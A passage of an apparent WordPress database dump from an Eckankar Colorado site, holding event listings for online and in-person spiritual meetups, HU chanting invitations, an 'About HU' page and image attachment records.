and mental clarity.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You will have the opportunity to listen to or chant HU a love song to God. HU is an undirected prayer that can act as a tuning fork and open your consciousness to the message the Holy Spirit has for you. HU is not meant to change your current beliefs but to enhance them.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/282533796/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>\'Déjà Vu: Have I Been Here Before?\'','','publish','closed','closed','','online-meetupdeja-vu-have-i-been-here-before-2','','','2021-12-09 16:05:04','2021-12-09 23:05:04','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266084',0,'mec-events','',0),(266085,0,'2021-12-10 16:02:15','2021-12-10 23:02:15','','','','publish','closed','closed','','266085','','','2021-12-10 16:02:15','2021-12-10 23:02:15','',0,'https://eckankar-colorado.org/nf_sub/266085/',0,'nf_sub','',0),(266086,0,'2021-12-11 04:49:54','2021-12-11 11:49:54','','','','publish','closed','closed','','266086','','','2021-12-11 04:49:54','2021-12-11 11:49:54','',0,'https://eckankar-colorado.org/nf_sub/266086/',0,'nf_sub','',0),(266087,0,'2021-12-12 10:32:00','2021-12-12 17:32:00','','','','publish','closed','closed','','266087','','','2021-12-12 10:32:00','2021-12-12 17:32:00','',0,'https://eckankar-colorado.org/nf_sub/266087/',0,'nf_sub','',0),(266088,0,'2021-12-12 11:02:30','2021-12-12 18:02:30','','','','publish','closed','closed','','266088','','','2021-12-12 11:02:30','2021-12-12 18:02:30','',0,'https://eckankar-colorado.org/nf_sub/266088/',0,'nf_sub','',0),(266089,0,'2021-12-13 18:50:18','2021-12-14 01:50:18','','','','publish','closed','closed','','266089','','','2021-12-13 18:50:18','2021-12-14 01:50:18','',0,'https://eckankar-colorado.org/nf_sub/266089/',0,'nf_sub','',0),(266093,0,'2021-12-16 06:38:54','2021-12-16 13:38:54','','','','publish','closed','closed','','266093','','','2021-12-16 06:38:54','2021-12-16 13:38:54','',0,'https://eckankar-colorado.org/nf_sub/266093/',0,'nf_sub','',0),(266095,0,'2021-12-17 07:13:20','2021-12-17 14:13:20','','','','publish','closed','closed','','266095','','','2021-12-17 07:13:20','2021-12-17 14:13:20','',0,'https://eckankar-colorado.org/nf_sub/266095/',0,'nf_sub','',0),(266098,0,'2021-12-19 11:01:41','2021-12-19 18:01:41','','','','publish','closed','closed','','266098','','','2021-12-19 11:01:41','2021-12-19 18:01:41','',0,'https://eckankar-colorado.org/nf_sub/266098/',0,'nf_sub','',0),(266099,0,'2021-12-19 11:15:49','2021-12-19 18:15:49','','','','publish','closed','closed','','266099','','','2021-12-19 11:15:49','2021-12-19 18:15:49','',0,'https://eckankar-colorado.org/nf_sub/266099/',0,'nf_sub','',0),(266100,0,'2021-12-19 11:21:16','2021-12-19 18:21:16','','','','publish','closed','closed','','266100','','','2021-12-19 11:21:16','2021-12-19 18:21:16','',0,'https://eckankar-colorado.org/nf_sub/266100/',0,'nf_sub','',0),(266103,2,'2021-12-26 11:29:19','2021-12-26 18:29:19','<p><span style=\"font-size: 16pt;\"><strong>What would you like your love story to be?</strong></span><br />\r\n<span style=\"font-size: 16pt;\"><strong>What are you passionate about?</strong></span><br />\r\n<span style=\"font-size: 16pt;\"><strong>What effect do you have on your family, friends, co-workers, neighbors?</strong></span><br />\r\n<span style=\"font-size: 16pt;\"><strong>What would help you through the ups and downs of your story?</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span><br />\r\n<span style=\"font-size: 14pt;\">“Do one thing each day for love alone. Don’t expect any kind of reward.”</span><br />\r\n<span style=\"font-size: 12pt;\"><em>—Stories to Help You See God In Your Life: The Book of ECK Parables, Vol. 4.</em></span></p>\r\n<p><span style=\"font-size: 14pt;\">You are warmly invited to this open discussion about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\r\n<p><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br />\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/Spiritual-Experiences-Group-of-Lone-Tree/events/282882706/?_xtd=gatlbWFpbF9jbGlja9oAJDI0ZTQ0YWJjLWM4ZWMtNDZhNS1hZDFmLTIwMDA2ZTU3YThiYg&amp;utm_campaign=rsvp-confirmation&amp;_af=event&amp;_af_eid=282882706&amp;utm_medium=email&amp;utm_source=join_rsvp_info\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>Our Life Is a Love Story That Matters<br>(An ECKANKAR Perspective)','','publish','closed','closed','','online-meetupyour-life-is-a-love-story-that-matters-an-eckankar-perspective','','','2021-12-26 11:38:10','2021-12-26 18:38:10','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266103',0,'mec-events','',0),(268893,0,'2023-08-13 16:27:56','2023-08-13 22:27:56','','','','publish','closed','closed','','268893','','','2023-08-13 16:27:56','2023-08-13 22:27:56','',0,'https://eckankar-colorado.org/nf_sub/268893/',0,'nf_sub','',0),(268894,0,'2023-08-13 21:03:44','2023-08-14 03:03:44','','','','publish','closed','closed','','268894','','','2023-08-13 21:03:44','2023-08-14 03:03:44','',0,'https://eckankar-colorado.org/nf_sub/268894/',0,'nf_sub','',0),(268895,0,'2023-08-13 21:04:45','2023-08-14 03:04:45','','','','publish','closed','closed','','268895','','','2023-08-13 21:04:45','2023-08-14 03:04:45','',0,'https://eckankar-colorado.org/nf_sub/268895/',0,'nf_sub','',0),(268896,0,'2023-08-13 21:05:35','2023-08-14 03:05:35','','','','publish','closed','closed','','268896','','','2023-08-13 21:05:35','2023-08-14 03:05:35','',0,'https://eckankar-colorado.org/nf_sub/268896/',0,'nf_sub','',0),(268897,0,'2023-08-13 21:17:34','2023-08-14 03:17:34','','','','publish','closed','closed','','268897','','','2023-08-13 21:17:34','2023-08-14 03:17:34','',0,'https://eckankar-colorado.org/nf_sub/268897/',0,'nf_sub','',0),(268932,0,'2023-08-25 09:39:43','2023-08-25 15:39:43','','','','publish','closed','closed','','268932','','','2023-08-25 09:39:43','2023-08-25 15:39:43','',0,'https://eckankar-colorado.org/nf_sub/268932/',0,'nf_sub','',0),(268899,2,'2023-08-15 13:29:10','2023-08-15 19:29:10','','creamy-blue-bk','','inherit','closed','closed','','creamy-blue-bk','','','2023-08-15 13:29:10','2023-08-15 19:29:10','',268811,'https://eckankar-colorado.org/wp-content/uploads/2023/08/creamy-blue-bk.jpg',0,'attachment','image/jpeg',0),(268931,0,'2023-08-24 12:07:24','2023-08-24 18:07:24','','','','publish','closed','closed','','268931','','','2023-08-24 12:07:24','2023-08-24 18:07:24','',0,'https://eckankar-colorado.org/nf_sub/268931/',0,'nf_sub','',0),(269116,0,'2023-09-25 19:09:03','2023-09-26 01:09:03','','','','publish','closed','closed','','269116','','','2023-09-25 19:09:03','2023-09-26 01:09:03','',0,'https://eckankar-colorado.org/nf_sub/269116/',0,'nf_sub','',0),(266105,2,'2021-12-26 11:28:31','2021-12-26 18:28:31','','pastel-daisies','','inherit','closed','closed','','pastel-daisies','','','2021-12-26 11:28:31','2021-12-26 18:28:31','',266103,'https://eckankar-colorado.org/wp-content/uploads/2021/12/pastel-daisies.jpg',0,'attachment','image/jpeg',0),(266107,0,'2021-12-27 08:50:04','2021-12-27 15:50:04','','','','publish','closed','closed','','266107','','','2021-12-27 08:50:04','2021-12-27 15:50:04','',0,'https://eckankar-colorado.org/nf_sub/266107/',0,'nf_sub','',0),(266108,0,'2021-12-27 17:13:07','2021-12-28 00:13:07','','','','publish','closed','closed','','266108','','','2021-12-27 17:13:07','2021-12-28 00:13:07','',0,'https://eckankar-colorado.org/nf_sub/266108/',0,'nf_sub','',0),(266109,2,'2021-12-29 10:39:35','2021-12-29 17:39:35','<p><span style=\"font-size: 16pt;\"><strong>Spiritual freedom means to be freed from whatever is causing us problems. You came into this life to spread your wings and live in freedom – heart, mind, and soul!</strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>Are you ready to accept the freedom of a new state of consciousness? And a renewed sense of joy and love for life?</strong></span><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">Open your wings and prepare for flight!</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions about \'Spiritual Freedom\' in this open discussion; explore with others who have similar spiritual interests.<br />\r\n<br />\r\n</span></span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"font-size: 14pt;\"><span style=\"color: #666666;\">“The ultimate state of spiritual freedom brings wisdom, love, and spiritual power. But there are stages in between. We expand or unfold from no freedom into a greater state of spiritual freedom.</span><span style=\"color: #666666;\">\"</span></span></p>\r\n<p><span style=\"font-size: 14pt; color: #666666;\">— Harold Klemp, <em> ECK WISDOM on Spiritual Freedom  </em>pg. 6</span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">This is the first of three free online explorations of ‘Spiritual Freedom’.<br />\r\nEach monthly meetup in this series will be its own discussion on some facets of ‘Spiritual Freedom’; you may enjoy, and are welcome to attend, any one or any combination of the three sessions. </span></p>\r\n<p><span style=\"font-size: 14pt;\">\'<em>ECK WISDOM on Spiritual Freedom</em>\', is a booklet which is a ticket to an unexpected destination – the heart of your being. It is available for purchase at the link below.</span></p>\r\n<p><span style=\"font-size: 14pt;\"><a class=\"link\" title=\"https://www.eckbooks.org/items/-2075-3.html?\" href=\"https://www.eckbooks.org/items/-2075-3.html?\" target=\"_blank\" rel=\"noopener\">ECK Wisdom on Spiritual Freedom </a>- </span><span style=\"font-size: 14pt;\">(small booklet, 92 pages)</span><br />\r\n<br />\r\n</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/282883813/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>\'Spiritual Freedom\'','','publish','closed','closed','','online-meetupspiritual-freedom','','','2021-12-29 10:57:34','2021-12-29 17:57:34','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266109',0,'mec-events','',0),(266111,0,'2021-12-29 12:38:12','2021-12-29 19:38:12','','','','publish','closed','closed','','266111','','','2021-12-29 12:38:12','2021-12-29 19:38:12','',0,'https://eckankar-colorado.org/nf_sub/266111/',0,'nf_sub','',0),(266113,0,'2021-12-30 13:41:00','2021-12-30 20:41:00','','','','publish','closed','closed','','266113','','','2021-12-30 13:41:00','2021-12-30 20:41:00','',0,'https://eckankar-colorado.org/nf_sub/266113/',0,'nf_sub','',0),(266114,0,'2021-12-30 13:49:31','2021-12-30 20:49:31','','','','publish','closed','closed','','266114','','','2021-12-30 13:49:31','2021-12-30 20:49:31','',0,'https://eckankar-colorado.org/nf_sub/266114/',0,'nf_sub','',0),(266117,2,'2022-01-01 09:57:00','2022-01-01 16:57:00','','masters-greeting-1','','inherit','closed','closed','','masters-greeting-1','','','2022-01-01 09:57:00','2022-01-01 16:57:00','',266056,'https://eckankar-colorado.org/wp-content/uploads/2021/12/masters-greeting-1.jpg',0,'attachment','image/jpeg',0),(266118,0,'2022-01-02 18:02:52','2022-01-03 01:02:52','','','','publish','closed','closed','','266118','','','2022-01-02 18:02:52','2022-01-03 01:02:52','',0,'https://eckankar-colorado.org/nf_sub/266118/',0,'nf_sub','',0),(266119,0,'2022-01-05 10:20:16','2022-01-05 17:20:16','','','','publish','closed','closed','','266119','','','2022-01-05 10:20:16','2022-01-05 17:20:16','',0,'https://eckankar-colorado.org/nf_sub/266119/',0,'nf_sub','',0),(266120,0,'2022-01-06 11:13:12','2022-01-06 18:13:12','','','','publish','closed','closed','','266120','','','2022-01-06 11:13:12','2022-01-06 18:13:12','',0,'https://eckankar-colorado.org/nf_sub/266120/',0,'nf_sub','',0),(266121,0,'2022-01-06 11:16:17','2022-01-06 18:16:17','','','','publish','closed','closed','','266121','','','2022-01-06 11:16:17','2022-01-06 18:16:17','',0,'https://eckankar-colorado.org/nf_sub/266121/',0,'nf_sub','',0),(266122,2,'2022-01-06 13:50:57','2022-01-06 20:50:57','<p><span style=\"font-size: 20pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p><strong><span style=\"font-size: 18pt;\">Open to people of all beliefs and faiths.</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"font-size: 14pt;\"> </span></p>\r\n<!-- END REGISTER BUTTON CODE -->','IN-PERSON - Experience HU, The Sound of Soul','','publish','closed','closed','','in-person-experience-hu-the-sound-of-soul','','','2022-01-06 14:04:33','2022-01-06 21:04:33','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266122',0,'mec-events','',0),(266123,2,'2022-01-06 14:07:39','2022-01-06 21:07:39','','winter-4B','','inherit','closed','closed','','winter-4b','','','2022-01-06 14:07:39','2022-01-06 21:07:39','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/01/winter-4B.jpg',0,'attachment','image/jpeg',0),(266131,2,'2022-01-07 10:38:50','2022-01-07 17:38:50','<div class=\"tmpl-video-5 boldgrid-section dynamic-gridblock\" style=\"background-image: linear-gradient(to left, rgba(135, 187, 236, 0.53), rgba(135, 187, 236, 0.53)), url(\'https://source.unsplash.com/Sd8O2SgKDJA/1920x1080\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://source.unsplash.com/Sd8O2SgKDJA/1920x1080\" data-bg-overlaycolor=\"rgba(135,187,236,0.53)\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 90px; padding-bottom: 80px;\" data-bg-overlaycolor=\"rgba(255,255,255,0.93)\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8\">\r\n<h2 class=\"\">&nbsp;</h2>\r\n<h2 class=\"color1-color\" style=\"font-size: 70px; margin-top: 20px; margin-bottom: -57px; font-family: Lusitana; font-weight: 400; font-style: normal; text-transform: none; text-shadow: #a0a0a0 0px 0px 7px;\" data-font-family=\"Lusitana\" data-font-weight=\"400\" data-font-style=\"normal\">The Essential<br>\r\nSacred Word.</h2>\r\n</div>\r\n<div class=\"col-md-4 col-xs-12 col-sm-4 align-column-bottom\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-video-2 boldgrid-section dynamic-gridblock\" style=\"background-image: linear-gradient(to left, #ffffff, #ffffff);\" data-bg-color-1=\"#FFFFFF\" data-bg-color-2=\"#FFFFFF\" data-bg-direction=\"to left\">\r\n<div class=\"container-fluid\"></div>\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 31px; font-weight: 400; color: #41527b; line-height: 1.3em; font-family: Lusitana;\" data-font-weight=\"400\" data-font-family=\"Lusitana\" data-font-style=\"\">The word is <strong>HU</strong>, an ancient carrier of love between Soul and Divine Spirit.</p>\r\n<p class=\"\" style=\"font-size: 23px; line-height: 1.6em; margin-top: 25px;\">This word is a tuning fork that aligns you with the Source of All Life—the ECK—the Life Force, the Holy Spirit. It instantly connects you to the Divine Source which is always working on your behalf.</p>\r\n<p class=\"\" style=\"font-size: 23px;\">Singing HU (pronounced like the word hue) for 20 minutes followed by 5 minutes of silence can enhance your spirituality, regardless of your path.<br>\r\n<br>\r\n</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-8 text-center\">\r\n<div class=\"bg-video bg-video-1 color3-border-color\" data-imhwpb-draggable=\"true\" style=\"margin: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/wc9N_g2NolA[/embed]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-audio-1 boldgrid-section dynamic-gridblock background-fixed\" style=\"background-image: linear-gradient(to left, rgba(255, 255, 255, 0.75), rgba(255, 255, 255, 0.75)), url(\'https://eckankar-colorado.org/wp-content/uploads/2019/08/ocean-2.jpg\'); background-size: cover; background-position: 50% 46%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ocean-2.jpg\" data-bg-overlaycolor=\"rgba(255,255,255,0.75)\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 11px;\">\r\n<div class=\"col-md-7 col-xs-12 col-sm-12\">\r\n<div style=\"margin: 50px 0px; padding: 2em;\" class=\"color1-background-color color-1-text-contrast bg-background-color bg-box\">\r\n<h3 class=\"\" style=\"margin-bottom: 10px; color: #41527b;\">Experience the sound of soul</h3>\r\n<p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #23507d;\"><em><strong>Thousands of voices singing \'HU\'</strong></em></span></p>\r\n<p>[embed linktext=\"Experience The Sound Of HU\"]https://eckankar-colorado.org/wp-content/uploads/2019/08/HU1.mp3[/embed]</p>\r\n<br>\r\n<br>\r\n<p class=\"\"><i class=\"fa fa-download fa-3x\" style=\"color: #23507d; margin-top: 0.5em;\" aria-hidden=\"true\"></i> <a class=\"\" style=\"font-size: 16px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/HU1.mp3\">Download HU – (Right click &amp; choose “Save Link As…”) </a></p>\r\n<p class=\"\"><i class=\"fa fa-thumbs-o-up fa-3x\" style=\"color: #23507d;\" aria-hidden=\"true\"></i> <a class=\"\" style=\"font-size: 16px;\" href=\"http://www.eckankar.org/Membership/invitation0.php\" target=\"_blank\" rel=\"noopener noreferrer\">Join 1 Year Advanced Spiritual Study Program</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-5 col-sm-12 col-xs-12\">\r\n<div class=\"rt-grid-7 rt-alpha\">\r\n<div id=\"text-520006\" class=\"rt-block  widget_text widget\">\r\n<div class=\"module-surround\">\r\n<div class=\"module-content\">\r\n<div class=\"textwidget\">\r\n<p class=\"\" data-font-weight=\"600\">&nbsp;</p>\r\n<p class=\"color3-color\" style=\"font-size: 23px; font-weight: 600; margin-top: 2em;\" data-font-weight=\"600\">The sound of HU can swing open the door of imagination, sharpen your focus, and help open your heart to its fullest.</p>\r\n<br>\r\n<p class=\"color3-color\" style=\"font-size: 23px; font-weight: 600;\" data-font-weight=\"600\">HU (pronounced hue), owned by no one, is God’s gift to the world.</p>\r\n<p data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 20px;\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\"><a class=\"\" style=\"font-family: Lusitana; font-weight: 600; font-size: 23px;\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" data-font-family=\"Lusitana\" data-font-weight=\"600\" data-font-style=\"\">Learn More About HU - The Sound of Soul</a></p>\r\n<br>\r\n<p class=\"color3-color\" style=\"font-size: 17px; font-weight: 600;\" data-font-weight=\"600\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','About HU','','publish','closed','closed','','about-hu','','','2022-01-07 12:03:26','2022-01-07 19:03:26','',0,'https://eckankar-colorado.org/?page_id=266131',0,'page','',0),(266134,2,'2022-01-07 10:38:50','2022-01-07 17:38:50',' ','','','publish','closed','closed','','266134','','','2022-01-07 10:38:50','2022-01-07 17:38:50','',0,'https://eckankar-colorado.org/266134/',27,'nav_menu_item','',0),(266153,2,'2022-01-09 08:52:37','2022-01-09 15:52:37','<p><strong><span style=\"font-size: 16pt;\">Open your heart to life and experience spiritual awakening. Realize the secret of shifting your attention to what makes life good. Each moment offers a chance to develop beauty and grace, to reach spiritual goals and to feel joy and love.</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">- Explore ways to handle loss, and see the good things when life is hard.</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">- Reflect on life’s circumstances, and shift to see how events happened for us, not just to us.</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">- Discover your own unique path to divine love.</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Come share your hopes, thoughts, and experiences about “What Makes Our Life Good” in this open discussion. Explore with others who have similar spiritual interests. During the discussion you will have the opportunity to try a spiritual exercise to lift your consciousness and grasp the message Divine Spirit has for you.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">“You may be sure that this spiritual odyssey is worth every single moment.” Harold Klemp -<em> ECK WISDOM on Spiritual Freedom</em> - pg. 73</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><em><a class=\"link\" title=\"https://www.eckankar.org/cgi-bin/gift4U.cgi?esamgift=EW-spir-freedom-mag.pdf\" href=\"https://www.eckankar.org/cgi-bin/gift4U.cgi?esamgift=EW-spir-freedom-mag.pdf\" target=\"_blank\" rel=\"noopener\">ECK WISDOM on Spiritual Freedom</a></em>, is a booklet which is a ticket to an unexpected destination – the heart of your being.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs. To learn more about ECKANKAR in Colorado visit <a class=\"link\" title=\"https://www.eckankar-colorado.org\" href=\"https://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"noopener\">Eckankar In Colorado</a></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">If you would like to hear the experiences of others who are awakening to the good in their own lives, check out the free <a class=\"link\" title=\"https://www.eckankar.org/engage/attend-an-event/eny21-online-event/,\" href=\"https://www.eckankar.org/engage/attend-an-event/eny21-online-event/,\" target=\"_blank\" rel=\"noopener\">Soul Adventure Seminar- Secrets of Divine Creativity</a>. It is available online through Jan. 31, 2022. The main talk is a real treat.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283140990/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - \'Reflections on What Makes Our Life Good\'','','publish','closed','closed','','online-meetup-reflections-on-what-makes-our-life-good','','','2022-01-09 09:07:26','2022-01-09 16:07:26','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266153',0,'mec-events','',0),(266155,2,'2022-01-09 08:57:06','2022-01-09 15:57:06','','girl-smiling-on-hill-1','','inherit','closed','closed','','girl-smiling-on-hill-1','','','2022-01-09 08:57:06','2022-01-09 15:57:06','',266153,'https://eckankar-colorado.org/wp-content/uploads/2022/01/girl-smiling-on-hill-1.jpg',0,'attachment','image/jpeg',0),(266157,2,'2022-01-09 09:25:48','2022-01-09 16:25:48','<p><strong><span style=\"font-size: 16pt;\">Open your heart to life and experience spiritual awakening. Realize the secret of shifting your attention to what makes life good. Each moment offers a chance to develop beauty and grace, to reach spiritual goals and to feel joy and love.</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">- Explore ways to handle loss, and see the good things when life is hard.</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">- Reflect on life’s circumstances, and shift to see how events happened for us, not just to us.</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">- Discover your own unique path to divine love.</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Come share your hopes, thoughts, and experiences about “What Makes Our Life Good” in this open discussion. Explore with others who have similar spiritual interests. During the discussion you will have the opportunity to try a spiritual exercise to lift your consciousness and grasp the message Divine Spirit has for you.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">“You may be sure that this spiritual odyssey is worth every single moment.” Harold Klemp -<em> ECK WISDOM on Spiritual Freedom</em> - pg. 73</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><em><a class=\"link\" title=\"https://www.eckankar.org/cgi-bin/gift4U.cgi?esamgift=EW-spir-freedom-mag.pdf\" href=\"https://www.eckankar.org/cgi-bin/gift4U.cgi?esamgift=EW-spir-freedom-mag.pdf\" target=\"_blank\" rel=\"noopener\">ECK WISDOM on Spiritual Freedom</a></em>, is a booklet which is a ticket to an unexpected destination – the heart of your being.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs. To learn more about ECKANKAR in Colorado visit <a class=\"link\" title=\"https://www.eckankar-colorado.org\" href=\"https://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"noopener\">Eckankar In Colorado</a></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">If you would like to hear the experiences of others who are awakening to the good in their own lives, check out the free <a class=\"link\" title=\"https://www.eckankar.org/engage/attend-an-event/eny21-online-event/,\" href=\"https://www.eckankar.org/engage/attend-an-event/eny21-online-event/,\" target=\"_blank\" rel=\"noopener\">Soul Adventure Seminar- Secrets of Divine Creativity</a>. It is available online through Jan. 31, 2022. The main talk is a real treat.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283140996/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - \'Reflections on What Makes Our Life Good\'','','publish','closed','closed','','online-meetup-reflections-on-what-makes-our-life-good-595','','','2022-01-09 09:32:17','2022-01-09 16:32:17','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266157',0,'mec-events','',0),(266159,2,'2022-01-09 09:54:49','2022-01-09 16:54:49','<p><strong><span style=\"font-size: 15pt;\">How do you keep your own consciousness expansive and expanding?</span></strong><br />\r\n<strong><span style=\"font-size: 15pt;\">How do you balance what you want and still leave other people their freedom?</span></strong><br />\r\n<strong><span style=\"font-size: 15pt;\">How does loving what you do help to expand your awareness?</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You are warmly welcomed to this spiritual discussion. We will be exploring techniques to discover ways to find more spiritual freedom and expand your awareness. Our goal is that each participant will realize new ways to nurture their own expanding consciousness.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>Harold Klemp says in his book <em>ECK Wisdom on Spiritual Freedom</em></strong>, <br />\r\n“We ride the stormy sea of life, fighting the sea, wind, and towing waves. The journey, full of peril, seems endless. Then the clear Light of God streams through the storm clouds of daily living. It sheds the light of truth. It is Divine Spirit [the ECK]. Our battered ship has finally made its way to the calm waters of spiritual freedom. Now our journey may continue with purpose and direction.”</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">All are welcome.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283141686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - 12 Gifts of Spiritual Living:<br>Spiritual Freedom & Expanded Awareness','','publish','closed','closed','','online-meetup-12-gifts-of-spiritual-livingspiritual-freedom-expanded-awareness','','','2022-01-09 10:00:19','2022-01-09 17:00:19','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266159',0,'mec-events','',0),(266160,2,'2022-01-09 09:53:47','2022-01-09 16:53:47','','bird-sky-1','','inherit','closed','closed','','bird-sky-1','','','2022-01-09 09:53:47','2022-01-09 16:53:47','',266159,'https://eckankar-colorado.org/wp-content/uploads/2022/01/bird-sky-1.jpg',0,'attachment','image/jpeg',0),(266169,2,'2022-01-12 12:20:16','2022-01-12 19:20:16','<p><strong><span style=\"font-size: 16pt;\">Do you want to master your own destiny?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">Do you know how to tap into your own inner guidance?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">Are you ready to create the life of your dreams?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this ECK Light &amp; Sound Service will give you tools to help you know and take your next step spiritually. It will include personal stories and techniques that can help you in your daily life.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp says in his book, Wisdom of the Heart, \"Loving God and yourself, and helping others, will speed your journey home.\" We will explore these sacred keys to finding your way home to God.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience 